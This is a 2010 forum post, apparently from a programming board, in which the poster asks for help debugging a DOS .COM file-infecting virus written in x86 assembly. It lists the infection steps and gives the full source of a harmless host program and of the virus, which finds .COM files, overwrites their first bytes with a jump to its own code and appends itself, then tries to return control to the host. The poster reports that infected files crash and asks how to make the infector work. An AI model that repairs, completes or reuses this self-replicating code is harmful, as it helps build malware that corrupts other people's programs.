October 3rd, 2010, 01:06 PM
Infecting COM problem
It's strictly educational, and I mean no harm.
The theory is as usual
1. find first file
2. read first four bytes
3. store it
4. replace with 3 byte jump code and a virus signature
5. go to 100h
Now the infected COM does not seem to be working: although it prints the virus's hello-world string, it crashes right after that.
the host file...
Code:
c_seg segment 'code'
org 100h                        ; .COM image: code starts at offset 100h
assume cs:c_seg, ds:c_seg, es:c_seg
; Minimal .COM host program (MASM/TASM syntax, DOS int 21h services).
; Prints one character ('Z') to stdout, then terminates.
main proc near
start:
mov dl, 'Z'                     ; character to print
mov ah, 02h                     ; int 21h, AH=02h: write DL to standard output
int 21h
mov ah, 4ch                     ; int 21h, AH=4Ch: terminate process (AL = exit code, not set here)
int 21h
main endp
c_seg ends
end start                       ; program entry point
This is the virus
Code:
c_seg segment 'code'
org 100h
assume cs:c_seg
main proc far
start_:
mov ax, cs
mov ds, ax
mov es, ax
call fals_proc
fals_proc proc
fals_proc endp
pop bp
sub bp, offset fals_proc
; set DTA
mov ah, 1Ah
lea dx, [bp + offset DTA]
int 21h
; find first file
mov ah, 4eh
lea dx, [bp + offset first_file]
mov cx, 7
int 21h
; preparing full path
lea di, [bp + offset file_name]
mov byte ptr[di], '.'
inc di
mov byte ptr[di], '\'
inc di
lea si, [bp + offset DTA + 1Eh]
rep movsb
mov byte ptr[di], 0
; open file
mov ah, 3Dh
mov al, 2
lea dx, [bp + offset file_name]
int 21h
; save handle
push ax
;push ax
pop bx
;pop [bp + fHandle]
; read first four bytes
mov ah, 3Fh
mov cx, 4
lea dx, [bp + offset buffer]
int 21h
;==debug==
;mov ah, 02h
;mov dl, byte ptr[bp + offset buffer + 3]
;int 21h
mov al, byte ptr[bp + offset buffer + 3]
mov dl, byte ptr [bp + offset vir_sig]
cmp al, dl
jne jmp_patchin_
mov ah, 3Eh
int 21h
mov ah, 4ch
int 21h
;==debug==
jmp_patchin_:
; set file pointer to begin
mov ax, 4200h
mov cx, 0
mov dx, 0
int 21h
; ===== the jump patch =====
mov byte ptr[bp + jmp_patch], 0E9h
mov ax, word ptr[bp + offset DTA + 1Ah] ; the file size
sub ax, 3
mov word ptr[bp + jmp_patch + 1], ax
mov al, vir_sig
mov byte ptr[bp + jmp_patch + 3], al
mov ah, 40h
mov cx, 4
lea dx, [bp + offset jmp_patch]
int 21h
; append the virus
mov ax, 4202h
mov cx, 0
mov dx, 0
int 21h
mov ah, 40h
mov cx, offset vir_sig - offset start_
lea dx, [bp + offset start_]
int 21h
; close
mov ah, 3Eh
int 21h
; restore
mov cx, 4
lea si, [bp + offset buffer]
mov di, 100h
rep movsb
mov ah, 09h
lea dx, [bp + offset infection]
int 21h
mov ax, 0100h
jmp ax
;quit_:
; mov ah, 4ch
; int 21h
DTA db 43 dup (?)
first_file db '.\*.COM', 0
file_name db 255 dup (?)
extra_buffer db 20 dup (?)
fHandle dw ?
buffer db 4 dup (?)
jmp_patch db 4 dup (?)
file_len db 2 dup (?)
virus_len dw ?
infection db "Hello World$"
vir_sig db 'Y'
main endp
c_seg ends
end start_
At a loss — could someone please help? Thanks in advance.